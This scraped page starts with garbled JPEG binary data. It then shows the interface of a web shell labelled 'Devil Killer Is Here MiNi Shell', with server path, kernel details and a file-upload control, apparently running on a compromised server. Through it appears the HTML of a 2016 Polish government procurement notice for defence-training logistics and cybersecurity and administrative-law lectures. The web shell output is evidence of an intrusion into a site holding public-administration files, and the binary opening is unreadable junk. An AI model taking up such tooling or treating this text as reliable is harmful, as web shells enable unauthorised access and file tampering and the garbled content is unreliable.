JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160916/309845-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 309845 - 2016
              z dnia 2016-09-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Katowice: Kompleksowa usługa związana z zabezpieczeniem logistycznym organizowanych szkoleń obronnych oraz przygotowanie i przeprowadzenie wykładów  II postępowanie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Śląski Urząd Wojewódzki w Katowicach, krajowy numer identyfikacyjny
              51425985927000, ul.
              ul. Jagiellońska 
              25,
              40032  
              Katowice, woj.
              śląskie, państwo
              , tel.
              322 077 777, e-mail
              bdg-zp@katowice.uw.gov.pl, faks
              322 077 395.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.katowice.uw.gov.pl/news/ogloszenia_o_zamowieniach.html</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.katowice.uw.gov.pl/news/ogloszenia_o_zamowieniach.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna papierowa<br />
                Adres:
                <br />Śląski Urząd Wojewódzki w Katowicach, 40-032 Katowice, ul. Jagiellońska 25, Sekretariat Biura Administracyjnego, pokój nr 230</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Kompleksowa usługa związana z zabezpieczeniem logistycznym organizowanych szkoleń obronnych oraz przygotowanie i przeprowadzenie wykładów  II postępowanie<br /><b>Numer referencyjny: </b>BA.I.272.49.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia podzielony został na trzy zadania częściowe:
1)	Zadanie częściowe nr 1 - kompleksowa usługa związana z zabezpieczeniem logistycznym organizowanych szkoleń obronnych w terminie: 25-28 października 2016 r. (25-26.10.2016 r.  1-sza grupa; 27-28.10.2016 r.  2-ga grupa).

Kod CPV- 80550000-4 (usługi szkolenia w dziedzinie bezpieczeństwa)
Kod CPV- 55120000-7 (usługi hotelarskie w zakresie spotkań i konferencji)

Przedmiotem zamówienia jest zakup usług związanych z zabezpieczeniem logistycznym organizowanych w dniach 25  28 października  2016 r. szkoleń obronnych pracowników zajmujących się realizacją zadań związanych z przygotowaniami obronnymi państwa w jednostkach samorządu terytorialnego. 

Termin wykonania zamówienia: 25-28 października 2016 r. 
Zamówienie będzie realizowane w dwóch grupach, max 100 osób, min. 60 osób w ramach jednej grupy, w terminach: 25-26.10.2016 r.  1-sza grupa; 27-28.10.2016 r.  2-ga grupa.

Miejsce: hotel/ośrodek/obiekt usytuowany w ramach jednego obiektu usługowego, o standardzie minimum trzygwiazdkowym potwierdzonym stosowną decyzją Marszałka Województwa Śląskiego, położony na terenie powiatu bielskiego, cieszyńskiego lub żywieckiego. 

Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 1, został określony w załączniku nr 1.1 do SIWZ.

2)	Zadanie częściowe nr 2 - przygotowanie i przeprowadzenie dwugodzinnego wykładu w terminach: 25 października 2016 r. oraz 27 października 2016 r. nt.  Analiza aktualnych zagrożeń dla bezpieczeństwa narodowego płynących z cyberprzestrzeni oraz Metody i narzędzia ochrony przed atakami mającymi na celu zakłócenie lub sparaliżowanie pracy systemów teleinformatycznych jednostek organizacyjnych administracji publicznej i przedsiębiorców realizujących zadania obronne.

Kod CPV- 80550000-4 (usługi szkolenia w dziedzinie bezpieczeństwa)

Przedmiotem zamówienia jest zakup usługi związanej z zapewnieniem wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) w terminach: 25 października 2016 r. oraz 27 października 2016 r. 

Zamówienie będzie realizowane w dwóch grupach (max liczba uczestników w ramach jednej grupy   100 osób, min. 60 osób).

Przedmiotem zamówienia jest zapewnienie wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) dla grup nie przekraczających 100 osób  w następujących tematach:
Temat nr 1-  Analiza aktualnych zagrożeń dla bezpieczeństwa narodowego płynących z cyberprzestrzeni,
Temat nr 2  Metody i narzędzia ochrony przed atakami mającymi na celu zakłócenie lub sparaliżowanie pracy systemów teleinformatycznych jednostek organizacyjnych administracji publicznej i przedsiębiorców realizujących zadania obronne.

Miejsce realizacji zamówienia: 
Hotel/ośrodek/obiekt wybrany w drodze postępowania o udzielenie zamówienia publicznego (niniejsze postępowanie, zadanie częściowe nr 1).

Termin wykonania zamówienia:
25 października 2016 r. oraz 27 października 2016 r.

Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 2, został określony w załączniku nr 1.2 do SIWZ.

3)	Zadanie częściowe nr 3 - przygotowanie i przeprowadzenie dwugodzinnego  wykładu w terminach: 26 października 2016 r. oraz 28 października 2016 r. nt.  Kodeks postepowania administracyjnego  omówienie najważniejszych nowelizacji ustawy z lat 2015-2016 oraz  Prawne aspekty nakładania świadczeń na rzecz obrony w drodze decyzji administracyjnej. Zasady wszczynania i prowadzenia postepowania administracyjnego oraz wydania decyzji administracyjnej przez uprawniony organ I instancji.

Kod CPV- 80550000-4 (usługi szkolenia w dziedzinie bezpieczeństwa)

Przedmiotem zamówienia jest zakup usługi związanej z zapewnieniem wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) w terminach: 26 października 2016 r. oraz 28 października 2016 r. 

Zamówienie będzie realizowane w dwóch grupach (max liczba uczestników w ramach jednej grupy   100 osób, min. 60 osób).

Przedmiotem zamówienia jest zapewnienie wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) dla grup nie przekraczających 100 osób  w następujących tematach:
Temat nr 3  Kodeks postępowania administracyjnego  omówienie najważniejszych nowelizacji ustawy z lat 2015-2016,
Temat nr  4  Prawne aspekty nakładania świadczeń na rzecz obrony w drodze decyzji administracyjnej. Zasady wszczynania i prowadzenia postępowania administracyjnego oraz wydania decyzji administracyjnej przez uprawniony organ I instancji.

Miejsce realizacji zamówienia: 
Hotel/ośrodek/obiekt wybrany w drodze postępowania o udzielenie zamówienia publicznego (niniejsze postępowanie, zadanie częściowe nr 1).

Termin wykonania zamówienia:
26 października 2016 r. oraz 28 października 2016 r.

Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 3, został określony w załączniku nr 1.3 do SIWZ.<br /><br /><b>II.5) Główny kod CPV: </b>80550000-4<br /><b> Dodatkowe kody CPV:</b>55120000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 25/10/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że dysponuje:
- w zakresie zadania częściowego nr 2:
Trenerem/trenerami, który będzie spełniał wszystkie poniższe wymagania:
	wyższe wykształcenie, kierunek  informatyka i pokrewne,
	minimum 3 letnie doświadczenie dydaktyczne, obejmujące prowadzenie wykładów na uczelniach wyższych,
	minimum 3 letnie doświadczenie w prowadzeniu szkoleń poprzez wykazanie, iż w tym okresie przeprowadził co najmniej 3 szkolenia, które obejmowały swym zakresem zagadnienia z zakresu spraw obronnych dla grupy min. 15 osób każde.

Wykonawca wykaże spełnienie powyższego warunku składając wykaz osób, które będą brały udział w wykonaniu zamówienia  załącznik nr 7.1 do SIWZ.

- w zakresie zadania częściowego nr 3:
Trenerem/trenerami, który będzie spełniał wszystkie poniższe wymagania:
	wyższe wykształcenie, kierunek  prawo administracyjne i pokrewne,
	minimum 3 letnie doświadczenie dydaktyczne, obejmujące prowadzenie wykładów na uczelniach wyższych,
	minimum 3 letnie doświadczenie w prowadzeniu szkoleń poprzez wykazanie, iż w tym okresie przeprowadził co najmniej 3 szkolenia, które obejmowały swym zakresem zagadnienia z zakresu spraw obronnych dla grupy min. 15 osób każde.

Wykonawca wykaże spełnienie powyższego warunku składając wykaz osób, które będą brały udział w wykonaniu zamówienia  załącznik nr 7.2 do SIWZ.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, w odniesieniu do wymaganych dokumentów, stosuje się przepisy Rozporządzenia Ministra Rozwoju z dnia 26.07.2016 r. w sprawie rodzaju dokumentów jakich może żądać Zamawiający od Wykonawców w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 poz.1126)
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz osób , które będą brały udział w wykonaniu zamówienia (dotyczy wyłącznie zadań częściowych nr 2 i 3).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oświadczenia i dokumenty składane wraz z ofertą:
1)	aktualne na dzień składania oferty oświadczenia z art. 22 ust. 1 pkt. 2) i ust. 1 b ustawy oraz art. 24 ust. 1 pkt. 12  23 i art. 24 ust.5 pkt. 1 ustawy Pzp  zgodnie z załącznikiem nr 3 do SIWZ); oświadczenia stanowić będą wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu,
2)	W  zakresie zadana częściowego nr 1:
a)	wypełniony i podpisany przez Wykonawcę opis przedmiotu zamówienia  załącznik nr 1.1 do SIWZ;
b)	przynajmniej 6 zdjęć w wersji papierowej lub elektronicznej, przedstawiających hotel/ośrodek/obiekt w tym: 1 zdjęcie pokoju jednoosobowego, 1 zdjęcie pokoju dwuosobowego, 1 zdjęcie łazienki, 1 zdjęcie sali konferencyjnej, 1 zdjęcie restauracji i 1 zdjęcie hotelu/ośrodka/obiektu;
UWAGA: Wykonawca ma obowiązek opisać zdjęcia załączone do oferty, czy to w wersji elektronicznej czy papierowej, tak, by Zamawiający nie miał żadnych wątpliwości, co przedstawia dane zdjęcie. Zamawiający zwraca szczególną uwagę na prawidłowy opis zdjęcia przedstawiającego pokój dwuosobowy przeznaczony do pojedynczego wykorzystania.
c)	propozycja menu dla wszystkich planowanych posiłków oraz przerw kawowych (dwie propozycje, z których Zamawiający dokona wyboru jednej).

W zakresie zadana częściowego nr 2:
a)	wypełniony i podpisany przez Wykonawcę opis przedmiotu zamówienia  załącznik nr 1.2 do SIWZ.

W zakresie zadania częściowego nr 3:
a) wypełniony i podpisany przez Wykonawcę opis przedmiotu zamówienia  załącznik nr 1.3 do SIWZ.
3)	Wypełniony i podpisany formularz oferty (załącznik nr 2.1 i/lub 2.2 i/lub 2.3 SIWZ  odrębnie dla każdego zadania częściowego, odpowiednio do zadania, na które Wykonawca składa ofertę),
4)	wykaz osób, które będą brały udział w wykonaniu zamówienia (dotyczy wyłącznie zadań częściowych nr 2 i 3) - zgodnie z załącznikiem nr 7.1 i/lub 7.2 do SIWZ, w przypadku gdy Wykonawca zamierza otrzymać punkty w kryterium doświadczenia wykładowcy/trenera; w przypadku braku wykazu wykonawca otrzyma 0 pkt w kryterium doświadczenia wykładowcy/trenera.
5)	zobowiązanie podmiotu trzeciego o oddaniu do dyspozycji Wykonawcy zasobów w przypadku, gdy wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 22 a ustawy PZP, zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ;
pełnomocnictwo/pełnomocnictwa do podpisania oferty i załączników, w przypadku, gdy Wykonawcę reprezentuje pełnomocnik; Wykonawca składa niniejszy dokument w jednym egzemplarzu, niezależnie od tego na ile zadań częściowych składa ofertę
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
